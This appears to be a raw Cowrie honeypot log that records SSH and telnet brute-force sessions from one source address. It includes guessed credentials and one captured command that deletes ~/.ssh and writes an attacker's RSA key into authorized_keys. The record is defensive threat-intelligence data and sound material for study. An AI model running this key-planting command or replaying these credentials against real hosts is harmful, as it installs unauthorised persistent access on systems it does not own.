{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:54.457059Z","src_ip":"212.227.235.229","session":"fa2719e90fe4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:41:55.373677Z","src_ip":"212.227.235.229","session":"fa2719e90fe4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:55.606207Z","src_ip":"212.227.235.229","session":"fa2719e90fe4"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:55.610421Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45906,"dst_ip":"1.2.3.4","dst_port":23,"session":"73d23c326ea5","protocol":"telnet","message":"New connection: 212.227.235.229:45906 (1.2.3.4:23) [session: 73d23c326ea5]","sensor":"my-vps","timestamp":"2025-09-09T01:42:01.935963Z"}
{"eventid":"cowrie.session.closed","duration":12.799816131591797,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:03.981090Z","src_ip":"88.247.83.19","session":"a9cf8668dcdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60352,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1143caf71cb","protocol":"ssh","message":"New connection: 212.227.235.229:60352 (1.2.3.4:22) [session: f1143caf71cb]","sensor":"my-vps","timestamp":"2025-09-09T01:42:06.508961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:06.509856Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:06.758726Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:42:07.794569Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:42:08.312104Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:42:08.312767Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:42:08.313719Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:08.563783Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:42:09.168294Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:42:09.168956Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:42:09.420276Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:09.421104Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60356,"dst_ip":"1.2.3.4","dst_port":22,"session":"f73862c7f9f7","protocol":"ssh","message":"New connection: 212.227.235.229:60356 (1.2.3.4:22) [session: f73862c7f9f7]","sensor":"my-vps","timestamp":"2025-09-09T01:42:09.790885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:09.791772Z","src_ip":"212.227.235.229","session":"f73862c7f9f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:10.102843Z","src_ip":"212.227.235.229","session":"f73862c7f9f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:11.385964Z","src_ip":"212.227.235.229","session":"f73862c7f9f7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:12.699604Z","src_ip":"212.227.235.229","session":"f73862c7f9f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53184,"dst_ip":"1.2.3.4","dst_port":22,"session":"116959952e94","protocol":"ssh","message":"New connection: 212.227.235.229:53184 (1.2.3.4:22) [session: 116959952e94]","sensor":"my-vps","timestamp":"2025-09-09T01:42:12.892149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:12.892800Z","src_ip":"212.227.235.229","session":"116959952e94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:13.145055Z","src_ip":"212.227.235.229","session":"116959952e94"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:42:14.195201Z","src_ip":"212.227.235.229","session":"116959952e94"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:14.447867Z","src_ip":"212.227.235.229","session":"f1143caf71cb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:14.449141Z","src_ip":"212.227.235.229","session":"116959952e94"}
{"eventid":"cowrie.session.closed","duration":33.76008605957031,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:35.695981Z","src_ip":"212.227.235.229","session":"73d23c326ea5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57116,"dst_ip":"1.2.3.4","dst_port":22,"session":"fecc4527888c","protocol":"ssh","message":"New connection: 212.227.235.229:57116 (1.2.3.4:22) [session: fecc4527888c]","sensor":"my-vps","timestamp":"2025-09-09T01:42:37.953577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:37.954637Z","src_ip":"212.227.235.229","session":"fecc4527888c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36950,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccf078f86d12","protocol":"ssh","message":"New connection: 212.227.235.229:36950 (1.2.3.4:22) [session: ccf078f86d12]","sensor":"my-vps","timestamp":"2025-09-09T01:42:38.104763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:38.105505Z","src_ip":"212.227.235.229","session":"ccf078f86d12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:38.191151Z","src_ip":"212.227.235.229","session":"fecc4527888c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:38.366457Z","src_ip":"212.227.235.229","session":"ccf078f86d12"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:39.180949Z","src_ip":"212.227.235.229","session":"fecc4527888c"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:39.447568Z","src_ip":"212.227.235.229","session":"ccf078f86d12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45576,"dst_ip":"1.2.3.4","dst_port":22,"session":"58da7ffead16","protocol":"ssh","message":"New connection: 212.227.235.229:45576 (1.2.3.4:22) [session: 58da7ffead16]","sensor":"my-vps","timestamp":"2025-09-09T01:42:39.909818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:39.910990Z","src_ip":"212.227.235.229","session":"58da7ffead16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:40.150280Z","src_ip":"212.227.235.229","session":"58da7ffead16"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:40.418959Z","src_ip":"212.227.235.229","session":"fecc4527888c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:40.709909Z","src_ip":"212.227.235.229","session":"ccf078f86d12"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:41.147096Z","src_ip":"212.227.235.229","session":"58da7ffead16"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:42.391551Z","src_ip":"212.227.235.229","session":"58da7ffead16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55456,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d257bb7cccf","protocol":"ssh","message":"New connection: 212.227.235.229:55456 (1.2.3.4:22) [session: 1d257bb7cccf]","sensor":"my-vps","timestamp":"2025-09-09T01:42:44.119446Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51276,"dst_ip":"1.2.3.4","dst_port":22,"session":"74704e04b697","protocol":"ssh","message":"New connection: 212.227.235.229:51276 (1.2.3.4:22) [session: 74704e04b697]","sensor":"my-vps","timestamp":"2025-09-09T01:42:48.840199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:48.841081Z","src_ip":"212.227.235.229","session":"74704e04b697"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:48.960994Z","src_ip":"212.227.235.229","session":"74704e04b697"}
{"eventid":"cowrie.login.failed","username":"config","password":"changeme","message":"login attempt [config/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:49.482226Z","src_ip":"212.227.235.229","session":"74704e04b697"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:50.605407Z","src_ip":"212.227.235.229","session":"74704e04b697"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34704,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a7b98512c44","protocol":"telnet","message":"New connection: 212.227.125.160:34704 (1.2.3.4:23) [session: 8a7b98512c44]","sensor":"my-vps","timestamp":"2025-09-09T01:42:50.638688Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39184,"dst_ip":"1.2.3.4","dst_port":22,"session":"554ba24ca8d1","protocol":"ssh","message":"New connection: 212.227.235.229:39184 (1.2.3.4:22) [session: 554ba24ca8d1]","sensor":"my-vps","timestamp":"2025-09-09T01:42:55.363856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:55.364873Z","src_ip":"212.227.235.229","session":"554ba24ca8d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-